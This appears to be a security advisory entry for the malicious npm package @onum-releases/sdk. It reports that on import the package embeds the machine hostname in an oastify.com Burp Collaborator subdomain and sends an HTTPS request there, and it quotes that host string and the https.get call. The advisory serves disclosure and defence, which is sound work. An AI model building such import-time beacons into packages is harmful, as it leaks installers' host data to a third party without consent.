MAL-2026-6125
Dashboard / Malicious Package / MAL-2026-6125
MAL-2026-6125
Summary: Malicious code in @onum-releases/sdk (npm)
Details: Source: amazon-inspector (cae207a349e4bda9359f4981d60ec81d9492cd8624535ee01b44c8f3bf3b3208) On import, index.js reads the installer's machine hostname via os.hostname(), embeds it as a subdomain of a hardcoded *.oastify.com (Burp Collaborator out-of-band callback) host, and issues an HTTPS GET to that host. Specifically, index.js lines 5-7 build `sdk.<hostname>.200majoeu01dk02xnjdajro1isojc90y.oastify.com` and call `https.get({ host: host, path: '/sdk',... })`. The fetch fires unconditionally on `require('@onum-releases/sdk')` with no caller consent, leaking the installer's hostname (via both DNS and HTTPS) to whoever controls that Collaborator instance. The package's own description says 'Security PoC placeholder - benign, no runtime payload', but the shipped code does run an import-time beacon. The `@onum-releases` scope plus PoC framing is consistent with a dependency-confusion probe against an internal `onum` namespace; the harm to any installer who pulls it (intentionally or via name confusion) is host-identifier exfiltration to a third-party OAST server.
References: https://www.npmjs.com/package/@onum-releases/sdk/v/1.0.2, https://www.npmjs.com/package/@onum-releases/sdk/v/1.0.1, https://www.npmjs.com/package/@onum-releases/sdk/v/1.0.3
Affected packages
Package
Name: @onum-releases/sdk
Purl: pkg:npm/%40onum-releases%2Fsdk
Affected ranges
Type: N/A
Events:
